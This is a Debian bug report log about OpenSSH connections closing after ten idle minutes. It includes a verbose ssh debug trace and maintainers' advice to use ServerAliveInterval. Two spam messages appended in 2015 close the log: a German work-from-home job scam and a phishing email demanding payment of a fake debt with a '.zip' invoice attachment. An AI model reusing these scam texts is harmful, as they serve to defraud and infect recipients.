Debian Bug report logs - #243832
ssh: connection closed after 10 minutes

version graph

Package: ssh; Maintainer for ssh is Debian OpenSSH Maintainers <[email protected]>; Source for ssh is src:openssh (PTS, buildd, popcon).

Reported by: Vincent Lefevre <[email protected]>

Date: Thu, 15 Apr 2004 00:18:03 UTC

Severity: normal

Found in version 1:3.8p1-3

Reply or subscribe to this bug.

View this report as an mbox folder, status mbox, maintainer mbox


Report forwarded to [email protected], Matthew Vernon <[email protected]>:
Bug#243832; Package ssh. (full text, mbox, link).


Acknowledgement sent to Vincent Lefevre <[email protected]>:
New Bug report received and forwarded. Copy sent to Matthew Vernon <[email protected]>. (full text, mbox, link).


Message #5 received at [email protected] (full text, mbox, reply):

From: Vincent Lefevre <[email protected]>
To: Debian Bug Tracking System <[email protected]>
Subject: ssh: connection closed after 10 minutes
Date: Thu, 15 Apr 2004 02:09:36 +0200
Package: ssh
Version: 1:3.8p1-3
Severity: normal

My ssh connections close after being idle for 10 minutes exactly.
For instance:

ay:~> ssh -vvv loria                                                   <1:49:15
OpenSSH_3.8p1 Debian 1:3.8p1-3, SSH protocols 1.5/2.0, OpenSSL 0.9.7d 17 Mar 2004
debug1: Reading configuration data /home/lefevre/.ssh/config
debug1: /home/lefevre/.ssh/config line 3: Deprecated option "FallBackToRsh"
debug1: Applying options for loria
debug1: Applying options for *
debug1: Reading configuration data /etc/ssh/ssh_config
debug2: ssh_connect: needpriv 0
debug1: Connecting to loria.loria.fr [152.81.144.12] port 22.
debug1: Connection established.
debug1: identity file /home/lefevre/.ssh/identity type 0
debug3: Not a RSA1 key file /home/lefevre/.ssh/id_rsa.
debug2: key_type_from_name: unknown key type '-----BEGIN'
debug3: key_read: missing keytype
debug2: key_type_from_name: unknown key type 'Proc-Type:'
debug3: key_read: missing keytype
debug2: key_type_from_name: unknown key type 'DEK-Info:'
debug3: key_read: missing keytype
debug3: key_read: missing whitespace
debug3: key_read: missing whitespace
debug3: key_read: missing whitespace
debug3: key_read: missing whitespace
debug3: key_read: missing whitespace
debug3: key_read: missing whitespace
debug3: key_read: missing whitespace
debug3: key_read: missing whitespace
debug3: key_read: missing whitespace
debug3: key_read: missing whitespace
debug3: key_read: missing whitespace
debug3: key_read: missing whitespace
debug3: key_read: missing whitespace
debug2: key_type_from_name: unknown key type '-----END'
debug3: key_read: missing keytype
debug1: identity file /home/lefevre/.ssh/id_rsa type 1
debug1: identity file /home/lefevre/.ssh/id_dsa type -1
debug1: Remote protocol version 1.99, remote software version OpenSSH_3.7.1p2
debug1: match: OpenSSH_3.7.1p2 pat OpenSSH*
debug1: Enabling compatibility mode for protocol 2.0
debug1: Local version string SSH-2.0-OpenSSH_3.8p1 Debian 1:3.8p1-3
debug1: SSH2_MSG_KEXINIT sent
debug1: SSH2_MSG_KEXINIT received
debug2: kex_parse_kexinit: diffie-hellman-group-exchange-sha1,diffie-hellman-group1-sha1
debug2: kex_parse_kexinit: ssh-rsa,ssh-dss
debug2: kex_parse_kexinit: aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour,aes192-cbc,aes256-cbc,[email protected],aes128-ctr,aes192-ctr,aes256-ctr
debug2: kex_parse_kexinit: aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour,aes192-cbc,aes256-cbc,[email protected],aes128-ctr,aes192-ctr,aes256-ctr
debug2: kex_parse_kexinit: hmac-md5,hmac-sha1,hmac-ripemd160,[email protected],hmac-sha1-96,hmac-md5-96
debug2: kex_parse_kexinit: hmac-md5,hmac-sha1,hmac-ripemd160,[email protected],hmac-sha1-96,hmac-md5-96
debug2: kex_parse_kexinit: none,zlib
debug2: kex_parse_kexinit: none,zlib
debug2: kex_parse_kexinit: 
debug2: kex_parse_kexinit: 
debug2: kex_parse_kexinit: first_kex_follows 0 
debug2: kex_parse_kexinit: reserved 0 
debug2: kex_parse_kexinit: diffie-hellman-group-exchange-sha1,diffie-hellman-group1-sha1
debug2: kex_parse_kexinit: ssh-rsa,ssh-dss
debug2: kex_parse_kexinit: aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour,aes192-cbc,aes256-cbc,[email protected],aes128-ctr,aes192-ctr,aes256-ctr
debug2: kex_parse_kexinit: aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour,aes192-cbc,aes256-cbc,[email protected],aes128-ctr,aes192-ctr,aes256-ctr
debug2: kex_parse_kexinit: hmac-md5,hmac-sha1,hmac-ripemd160,[email protected],hmac-sha1-96,hmac-md5-96
debug2: kex_parse_kexinit: hmac-md5,hmac-sha1,hmac-ripemd160,[email protected],hmac-sha1-96,hmac-md5-96
debug2: kex_parse_kexinit: none,zlib
debug2: kex_parse_kexinit: none,zlib
debug2: kex_parse_kexinit: 
debug2: kex_parse_kexinit: 
debug2: kex_parse_kexinit: first_kex_follows 0 
debug2: kex_parse_kexinit: reserved 0 
debug2: mac_init: found hmac-md5
debug1: kex: server->client aes128-cbc hmac-md5 none
debug2: mac_init: found hmac-md5
debug1: kex: client->server aes128-cbc hmac-md5 none
debug1: SSH2_MSG_KEX_DH_GEX_REQUEST(1024<1024<8192) sent
debug1: expecting SSH2_MSG_KEX_DH_GEX_GROUP
debug2: dh_gen_key: priv key bits set: 135/256
debug2: bits set: 537/1024
debug1: SSH2_MSG_KEX_DH_GEX_INIT sent
debug1: expecting SSH2_MSG_KEX_DH_GEX_REPLY
debug3: check_host_in_hostfile: filename /home/lefevre/.ssh/known_hosts
debug3: check_host_in_hostfile: match line 14
debug3: check_host_in_hostfile: filename /home/lefevre/.ssh/known_hosts
debug3: check_host_in_hostfile: match line 14
debug1: Host 'loria.loria.fr' is known and matches the RSA host key.
debug1: Found key in /home/lefevre/.ssh/known_hosts:14
debug2: bits set: 517/1024
debug1: ssh_rsa_verify: signature correct
debug2: kex_derive_keys
debug2: set_newkeys: mode 1
debug1: SSH2_MSG_NEWKEYS sent
debug1: expecting SSH2_MSG_NEWKEYS
debug2: set_newkeys: mode 0
debug1: SSH2_MSG_NEWKEYS received
debug1: SSH2_MSG_SERVICE_REQUEST sent
debug2: service_accept: ssh-userauth
debug1: SSH2_MSG_SERVICE_ACCEPT received
debug2: key: /home/lefevre/.ssh/id_rsa (0x100562b0)
debug2: key: /home/lefevre/.ssh/id_dsa ((nil))
debug1: Authentications that can continue: publickey,password
debug3: start over, passed a different list publickey,password
debug3: preferred publickey,keyboard-interactive,password
debug3: authmethod_lookup publickey
debug3: remaining preferred: keyboard-interactive,password
debug3: authmethod_is_enabled publickey
debug1: Next authentication method: publickey
debug1: Offering public key: /home/lefevre/.ssh/id_rsa
debug3: send_pubkey_test
debug2: we sent a publickey packet, wait for reply
debug1: Server accepts key: pkalg ssh-rsa blen 149
debug2: input_userauth_pk_ok: fp 34:ab:19:e7:aa:36:6c:4f:3a:5d:cc:13:0c:ce:15:b4
debug3: sign_and_send_pubkey
debug1: Authentication succeeded (publickey).
debug1: channel 0: new [client-session]
debug3: ssh_session2_open: channel_new: 0
debug2: channel 0: send open
debug1: Entering interactive session.
debug2: callback start
debug2: ssh_session2_setup: id 0
debug2: channel 0: request pty-req
debug3: tty_make_modes: ospeed 38400
debug3: tty_make_modes: ispeed 38400
debug3: tty_make_modes: 1 3
debug3: tty_make_modes: 2 28
debug3: tty_make_modes: 3 8
debug3: tty_make_modes: 4 21
debug3: tty_make_modes: 5 4
debug3: tty_make_modes: 6 0
debug3: tty_make_modes: 7 0
debug3: tty_make_modes: 8 17
debug3: tty_make_modes: 9 19
debug3: tty_make_modes: 10 26
debug3: tty_make_modes: 12 18
debug3: tty_make_modes: 13 23
debug3: tty_make_modes: 14 22
debug3: tty_make_modes: 18 15
debug3: tty_make_modes: 30 0
debug3: tty_make_modes: 31 0
debug3: tty_make_modes: 32 0
debug3: tty_make_modes: 33 0
debug3: tty_make_modes: 34 0
debug3: tty_make_modes: 35 0
debug3: tty_make_modes: 36 1
debug3: tty_make_modes: 37 0
debug3: tty_make_modes: 38 0
debug3: tty_make_modes: 39 0
debug3: tty_make_modes: 40 0
debug3: tty_make_modes: 41 0
debug3: tty_make_modes: 50 1
debug3: tty_make_modes: 51 1
debug3: tty_make_modes: 52 0
debug3: tty_make_modes: 53 1
debug3: tty_make_modes: 54 1
debug3: tty_make_modes: 55 1
debug3: tty_make_modes: 56 0
debug3: tty_make_modes: 57 0
debug3: tty_make_modes: 58 0
debug3: tty_make_modes: 59 1
debug3: tty_make_modes: 60 1
debug3: tty_make_modes: 61 1
debug3: tty_make_modes: 62 0
debug3: tty_make_modes: 70 1
debug3: tty_make_modes: 71 0
debug3: tty_make_modes: 72 1
debug3: tty_make_modes: 73 0
debug3: tty_make_modes: 74 0
debug3: tty_make_modes: 75 0
debug3: tty_make_modes: 90 1
debug3: tty_make_modes: 91 1
debug3: tty_make_modes: 92 0
debug3: tty_make_modes: 93 0
debug2: channel 0: request shell
debug2: fd 3 setting TCP_NODELAY
debug2: callback done
debug2: channel 0: open confirm rwindow 0 rmax 32768
debug2: channel 0: rcvd adjust 131072
cshrc...
Shell level: 1 (login shell)
.cshrc.opts
.cshrc.term
.cshrc.local
.cshrc.env
.cshrc.aliases
executing /users/spaces/lefevre/i586-linux/bin/zsh -l
zshenv...
zshrc...
Shell level: 2 (login shell)
The tty is frozen
zlogin...
Agent pid 21609
loria1:~> debug1: channel 0: free: client-session, nchannels 1         <1:49:25
debug3: channel 0: status: The following connections are open:
  #0 client-session (t4 r0 i0/0 o0/0 fd 5/6)

debug3: channel 0: close_fds r 5 w 6 e 7
Read from remote host loria.loria.fr: Connection reset by peer
Connection to loria.loria.fr closed.
debug1: Transferred: stdin 0, stdout 0, stderr 102 bytes in 599.3 seconds
debug1: Bytes per second: stdin 0.0, stdout 0.0, stderr 0.2
debug1: Exit status -1
zsh: exit 255
You have new mail.
ay:~[255]>                                                             <1:59:22

The problem doesn't come from the server, as I've tried with another
ssh server and the same thing occurs (also after 10 minutes).

-- System Information:
Debian Release: testing/unstable
  APT prefers testing
  APT policy: (900, 'testing'), (200, 'unstable')
Architecture: powerpc (ppc)
Kernel: Linux 2.4.18-newpmac
Locale: LANG=POSIX, LC_CTYPE=en_US.ISO8859-1

Versions of packages ssh depends on:
ii  adduser                     3.52         Add and remove users and groups
ii  debconf                     1.4.21       Debian configuration management sy
ii  dpkg                        1.10.20      Package maintenance system for Deb
ii  libc6                       2.3.2.ds1-11 GNU C Library: Shared libraries an
ii  libpam-modules              0.76-16      Pluggable Authentication Modules f
ii  libpam-runtime              0.76-16      Runtime support for the PAM librar
ii  libpam0g                    0.76-16      Pluggable Authentication Modules l
ii  libssl0.9.7                 0.9.7d-1     SSL shared libraries
ii  libwrap0                    7.6-ipv6.1-3 Wietse Venema's TCP wrappers libra
ii  zlib1g                      1:1.2.1-5    compression library - runtime

-- debconf information:
  ssh/insecure_rshd: 
  ssh/privsep_ask: true
* ssh/user_environment_tell: 
* ssh/forward_warning: 
* ssh/insecure_telnetd: 
  ssh/new_config: true
* ssh/use_old_init_script: true
* ssh/SUID_client: true
* ssh/privsep_tell: 
  ssh/ssh2_keys_merged: 
* ssh/protocol2_only: false
  ssh/encrypted_host_key_but_no_keygen: 
* ssh/run_sshd: true



Information forwarded to [email protected], Matthew Vernon <[email protected]>:
Bug#243832; Package ssh. (full text, mbox, link).


Acknowledgement sent to Colin Watson <[email protected]>:
Extra info received and forwarded to list. Copy sent to Matthew Vernon <[email protected]>. (full text, mbox, link).


Message #10 received at [email protected] (full text, mbox, reply):

From: Colin Watson <[email protected]>
To: Vincent Lefevre <[email protected]>, [email protected]
Subject: Re: Bug#243832: ssh: connection closed after 10 minutes
Date: Thu, 15 Apr 2004 01:35:52 +0100
On Thu, Apr 15, 2004 at 02:09:36AM +0200, Vincent Lefevre wrote:
> Package: ssh
> Version: 1:3.8p1-3
> Severity: normal
> 
> My ssh connections close after being idle for 10 minutes exactly.

Seems more likely to be a network problem (e.g. NAT timeout) at your
client end than anything else, as it's certainly not a general problem.
Try looking at the various keepalive options; this is what they're there
for.

Cheers,

-- 
Colin Watson                                  [[email protected]]



Information forwarded to [email protected], Matthew Vernon <[email protected]>:
Bug#243832; Package ssh. (full text, mbox, link).


Acknowledgement sent to Vincent Lefevre <[email protected]>:
Extra info received and forwarded to list. Copy sent to Matthew Vernon <[email protected]>. (full text, mbox, link).


Message #15 received at [email protected] (full text, mbox, reply):

From: Vincent Lefevre <[email protected]>
To: Colin Watson <[email protected]>
Cc: [email protected]
Subject: Re: Bug#243832: ssh: connection closed after 10 minutes
Date: Thu, 15 Apr 2004 12:54:17 +0200
On 2004-04-15 01:35:52 +0100, Colin Watson wrote:
> On Thu, Apr 15, 2004 at 02:09:36AM +0200, Vincent Lefevre wrote:
> > My ssh connections close after being idle for 10 minutes exactly.
> 
> Seems more likely to be a network problem (e.g. NAT timeout) at your
> client end than anything else, as it's certainly not a general problem.
> Try looking at the various keepalive options; this is what they're there
> for.

I did set KeepAlive to no in my .ssh/config file (to prevent the ssh
connection from being closed during an ADSL reconnection). But it
seems that something has changed.

-- 
Vincent Lefèvre <[email protected]> - Web: <http://www.vinc17.org/>
100% validated (X)HTML - Acorn / RISC OS / ARM, free software, YP17,
Championnat International des Jeux Mathématiques et Logiques, etc.
Work: CR INRIA - computer arithmetic / SPACES project at LORIA



Information forwarded to [email protected], Matthew Vernon <[email protected]>:
Bug#243832; Package ssh. (full text, mbox, link).


Acknowledgement sent to Darren Tucker <[email protected]>:
Extra info received and forwarded to list. Copy sent to Matthew Vernon <[email protected]>. (full text, mbox, link).


Message #20 received at [email protected] (full text, mbox, reply):

From: Darren Tucker <[email protected]>
To: Vincent Lefevre <[email protected]>
Cc: [email protected]
Subject: Debian Bug #243832: possible solution
Date: Sat, 22 May 2004 17:48:17 +1000
> I did set KeepAlive to no in my .ssh/config

KeepAlive (now known as TCPKeepAlive) is a per-socket option that 
enables the system-wide TCP keepalive timer (which defaults to 120 minutes).

You probably want "ServerAliveInterval 300" in ssh_config or 
$HOME/.ssh/config.  This will cause ssh to send an application-level 
keepalive every 5 minutes if there's no other traffic, which will keep 
the connection "fresh" in the firewall or NAT device's state table.

-- 
Darren Tucker (dtucker at zip.com.au)
GPG key 8FF4FA69 / D9A3 86E9 7EEE AF4B B2D4  37C9 C982 80C7 8FF4 FA69
    Good judgement comes with experience. Unfortunately, the experience
usually comes from bad judgement.



Information forwarded to [email protected], Matthew Vernon <[email protected]>:
Bug#243832; Package ssh. (full text, mbox, link).


Acknowledgement sent to Vincent Lefevre <[email protected]>:
Extra info received and forwarded to list. Copy sent to Matthew Vernon <[email protected]>. (full text, mbox, link).


Message #25 received at [email protected] (full text, mbox, reply):

From: Vincent Lefevre <[email protected]>
To: Darren Tucker <[email protected]>
Cc: [email protected]
Subject: Re: Debian Bug #243832: possible solution
Date: Sat, 22 May 2004 10:50:46 +0200
On 2004-05-22 17:48:17 +1000, Darren Tucker wrote:
> You probably want "ServerAliveInterval 300" in ssh_config or 
> $HOME/.ssh/config.  This will cause ssh to send an application-level 
> keepalive every 5 minutes if there's no other traffic, which will keep 
> the connection "fresh" in the firewall or NAT device's state table.

Thanks, I don't know if this works as the router I'm using ATM never
closes the connections, but this seems to be the right option (I don't
remember seeing it before). I've also set ServerAliveCountMax to a big
number, so that the connection isn't closed when there is a temporary
network problem.

-- 
Vincent Lefèvre <[email protected]> - Web: <http://www.vinc17.org/>
100% validated (X)HTML - Acorn / RISC OS / ARM, free software, YP17,
Championnat International des Jeux Mathématiques et Logiques, etc.
Work: CR INRIA - computer arithmetic / SPACES project at LORIA



Information forwarded to [email protected], Matthew Vernon <[email protected]>:
Bug#243832; Package ssh. (full text, mbox, link).


Acknowledgement sent to Darren Tucker <[email protected]>:
Extra info received and forwarded to list. Copy sent to Matthew Vernon <[email protected]>. (full text, mbox, link).


Message #30 received at [email protected] (full text, mbox, reply):

From: Darren Tucker <[email protected]>
To: Vincent Lefevre <[email protected]>
Cc: [email protected]
Subject: Re: Debian Bug #243832: possible solution
Date: Sat, 22 May 2004 18:59:21 +1000
Vincent Lefevre wrote:
> Thanks, I don't know if this works as the router I'm using ATM never
> closes the connections, but this seems to be the right option (I don't
> remember seeing it before).

It's new in OpenSSH upstream (first appeared in 3.8), although Debian 
used to have a third-party patch that did more or less the same thing.

-- 
Darren Tucker (dtucker at zip.com.au)
GPG key 8FF4FA69 / D9A3 86E9 7EEE AF4B B2D4  37C9 C982 80C7 8FF4 FA69
    Good judgement comes with experience. Unfortunately, the experience
usually comes from bad judgement.



Information forwarded to [email protected], Debian OpenSSH Maintainers <[email protected]>:
Bug#243832; Package ssh. (Fri, 17 Apr 2015 12:12:04 GMT) (full text, mbox, link).


Acknowledgement sent to <[email protected]>:
Extra info received and forwarded to list. Copy sent to Debian OpenSSH Maintainers <[email protected]>. (Fri, 17 Apr 2015 12:12:04 GMT) (full text, mbox, link).


Message #35 received at [email protected] (full text, mbox, reply):

From: "Straff SC" <[email protected]>
To: "243832" <[email protected]>
Subject: Online Arbeitsagentur Angebote 2015 für Sie
Date: Fri, 17 Apr 2015 12:09:20 GMT
Sehr geehrte/r Interessent/in,

die Arbeitsvermittlung stellt Ihnen nachfolgend eine interessante Stelle in einem internationalen Team im Home Office Bereich vor, ohne Fahrtkosten, ohne Anfahrtswege, ohne Stau:

Wir schaffen qualitative und attraktive Arbeitsplätze auch auf dem Land europaweit und bieten gleichzeitig hochwertige Qualität für unsere Auftraggeber. 

Ab sofort sind folgenden Stellen zu besetzen:
Kollegen (m/w) für Home-office Tätigkeit in der Abteilung Office und Kommunikation 

Ihre Tätigkeitsschwerpunkte wären:

- Unterlagen empfangen, bearbeiten und weiterleiten
- Unterlagen kopieren/einscannen
- Mails beantworten
- Aufgabe im Home-office in freien Zeiteinteilung
- Umgang mit zur Verfügung gestellten Büroausstattungen

Was von Ihnen erwartet wird:

- Problemloser Umgang mit Email, PC und Internet
- Deutsch fließend, Fremdsprachen sind von Vorteil
- kundenorientiertes Teamwork
- Genauigkeit und Zielstrebigkeit

Wir bieten Ihnen einen Arbeitsplatz als Festangestellter oder als Freiberufler mit einem Stundenlohn von 20 € Brutto die Stunde in selbständigen Arbeitsweise und einer modernen Beschäftigungsform, sowie eine abwechslungsreiche Tätigkeit ohne Fahrzeit mit flexiblen Arbeitszeiten. 

Es werden keine Fachkenntnisse vorausgesetzt. Die Einarbeitung findet detailliert durch professionelle Mitarbeiten statt. Die nötige technische Ausstattung stellen wir Ihnen ohne weitere Kosten zur Verfügung. Die Position kann gerne nebenberuflich aufgenommen werden sowie von Rentnern und Hausfrauen. 

Sie sind offen für flexible Arbeitszeitmodelle und die Arbeit im Home-office? Wenn wir Ihr Interesse geweckt haben, senden Sie uns Ihre Bewerbung per E-Mail an: [email protected] 


Wir freuen uns auf Ihre Antwort.

Es grüßt Sie Ihre

Straff SC




Information forwarded to [email protected], Debian OpenSSH Maintainers <[email protected]>:
Bug#243832; Package ssh. (Mon, 29 Jun 2015 08:57:12 GMT) (full text, mbox, link).


Acknowledgement sent to "Beauftragter Rechtsanwalt DirectPay GmbH" <[email protected]>:
Extra info received and forwarded to list. Copy sent to Debian OpenSSH Maintainers <[email protected]>. (Mon, 29 Jun 2015 08:57:12 GMT) (full text, mbox, link).


Message #40 received at [email protected] (full text, mbox, reply):

From: "Beauftragter Rechtsanwalt DirectPay GmbH" <[email protected]>
To: "243832" <[email protected]>
Subject: Ihr gespeichertes Girokonto ist nicht hinreichend gedeckt
Date: Mon, 29 Jun 2015 08:56:19 GMT
[Message part 1 (text/plain, inline)]
Sehr geehrter Käufer,

Sie haben eine nicht gedeckte Forderung bei der Firma DirectPay GmbH. Ihr Kreditinstitut hat die Lastschrift zurück gebucht, da Ihr Bankkonto im Moment der Abbuchung nicht genügend gedeckt war. 

Wir erwarten die Zahlung bis spätestens 02.07.2015 auf unser Girokonto 

Aufgrund des andauernden Zahlungsausstands sind Sie gezwungen zusätzlich, die durch unsere Inanspruchnahme entstandenen Gebühren von 51,47 Euro zu tragen. Namens unseren Mandanten DirectPay GmbH ordnen wir Ihnen an, die offene Gesamtforderung schnellstens zu decken. Bei Rückfragen oder Reklamationen erwarten wir eine Kontaktaufnahme innerhalb von zwei Werktagen. Eine vollständige Kostenaufstellung, der Sie alle Buchungen entnehmen können, ist beigefügt. Nach Ablauf der Frist wird die Angelegenheit dem Staatsanwalt und der SCHUFA übergeben. 

Mit freundlichen Grüßen

Beauftragter Rechtsanwalt Haas Marlon
[Rechnung vom 29.06.2015 - Beauftragter Rechtsanwalt.zip (application/octet-stream, attachment)]

Send a report that this bug log contains spam.


Debian bug tracking system administrator <[email protected]>. Last modified: Tue May 13 15:59:24 2025; Machine Name: buxtehude

Debian Bug tracking system

Debbugs is free software and licensed under the terms of the GNU General Public License version 2. The current version can be obtained from https://bugs.debian.org/debbugs-source/.

Copyright © 1999 Darren O. Benham, 1997,2003 nCipher Corporation Ltd, 1994-97 Ian Jackson, 2005-2017 Don Armstrong, and many other contributors.